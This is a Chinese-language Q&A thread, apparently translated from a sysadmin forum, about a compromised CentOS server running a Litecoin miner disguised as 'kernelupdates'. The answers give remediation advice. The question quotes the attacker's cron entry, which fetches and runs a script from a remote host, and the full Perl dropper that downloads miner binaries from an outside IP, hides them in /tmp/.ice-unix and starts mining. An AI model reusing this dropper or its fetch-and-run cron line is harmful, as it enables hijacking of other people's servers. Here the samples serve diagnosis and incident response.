我有一台 CENTOS6 服务器,上面运行着一些 wordpress 和 tomcat 网站。在过去的两天里,它一直崩溃。经过调查,我们发现 kernelupdates 二进制文件占用了服务器上 100% 的 CPU。下面提到了这个过程。
./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx
但此进程似乎无效的内核更新。可能是服务器被入侵,并且此进程是由黑客安装的,因此我终止了此进程并删除了 apache 用户的 cron 条目。
但不知何故这个过程在几个小时后又开始了并且 cron 条目也恢复了,我正在寻找修改 cron 作业的东西。
- 这个过程属于挖掘过程吗?
- 我们如何才能停止cronjob的修改,并清理这个进程的源头呢?
Cron 条目(apache 用户)
/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
ABC文件
#!/usr/bin/perl
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) {
$rn=int(rand(11));
}
$exists=`ls /tmp/.ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch=~/kernelupdates/gi) { die; }
if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
$wig=`wget --version | grep GNU`;
if(length($wig>6)) {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
} else {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
}
}
@prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";
system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
print "done!\n";
答案1
此进程是莱特币(一种替代加密货币)挖矿进程。有权访问您服务器的人正在使用您的服务器生成莱特币(=赚钱)。这个kernelupdates名字很可能只是为了让您感到困惑。
在删除任何内容之前,我建议备份所有文件,并找出这些文件是如何被放入服务器的。如果你删除了这些文件,但没有消除安全问题,那么这些文件很有可能再次出现。我敢打赌,Wordpress 或一些过时的插件是安全漏洞。
找到并修复安全问题后,尝试在系统日志中查看 cron 日志。这可能会提示您如何插入 cronjob。
答案2
我的服务器刚刚被这个攻击了。我可以在日志中看到我在一个旧的 wordpress 网站上被攻击,几秒钟后,他们开始反复运行 cron 作业。有趣的是,我已经拥有这个网站很长时间了,而且只有在我切换到 nginx 和 php-fpm 时才会发生这种情况,你的设置是否相同?
我希望所发生的一切是他们能够通过 php/wordpress 中的漏洞安装这些 cron 作业,基本上他们:
- 获得 shell 访问权限并执行
crontab -e以启动 cron 任务 - cron 任务放入脚本
/tmp/abc.txt.1并执行 - 该脚本下载莱特币矿工并重
/etc/.ice-unix命名kernelupdates并启动它 - 他们通过反复触发 cron 任务来确保矿工始终处于原地
spdrman.2另请注意,莱特币用户名在和之间略有变化spdrman.10。
有一件事,请检查你的 /etc/passwd 中是否有你的 apache 用户。我愚蠢地将我的 shell 设置为/bin/bash这样,这样设置可能更安全/bin/false
另外,如果可能的话,请确保您的 Apache 用户无法执行诸如crontab、wget或之类的命令curl,以阻止这种情况再次发生。这些命令似乎是他们进入时所做事情的核心。
为了谨慎起见,我再次更改了 ssh 端口,我已仔细检查,并已PermitRootLogin no在 sshd 设置中进行设置,因此我很确定他们无法直接以 root 身份进入
答案3
我也遇到了这个问题,显然某个用户的密码不知何故被泄露了。我目前所做的是:
- 使用 -9 终止该进程(这是该用户的唯一进程)
- 使用以下方法清除该用户的 crontab
sudo crontab -e -u <user> - 禁用该用户的登录
sudo usermod -s /usr/sbin/nologin <user>(/sbin/nologin如果/bin/false不可用,请尝试) - 更改了用户的密码并删除
~/.ssh/authorized_keys - 用户能够写入启用 PHP 的网站的 docroot。因此我禁用了该网站。如果他们在此处放置了恶意脚本,他们就可以重新启动进程。
- 检查该过程是否已重新启动(如果已重新启动,请重复到目前为止的所有操作)
- 安装
chkrootkit并rkhunter运行(只是误报)
接下来要做的是重建整个服务器。这只是一个虚拟机,无论如何我都想使用以下方法自动完成配置Ansible,但匆忙完成这件事仍然很不愉快。但这是确保没有任何东西被篡改的唯一方法。
答案4
根据您提供的 perl 脚本,您的服务器已被入侵。我强烈建议安装 chrootkit(yum install chrootkit)并检查文件系统。我还建议禁用该 cronjob,这样 rootkit 就不会更新。